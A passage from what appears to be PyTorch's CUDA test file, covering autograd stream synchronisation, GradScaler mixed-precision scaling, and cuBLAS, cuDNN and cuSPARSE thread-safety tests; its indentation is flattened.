def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back the device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note, these parameters should be very carefully tuned
# Too small number makes it hard for the racing condition
# to happen, while too large number sometimes cause hang
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
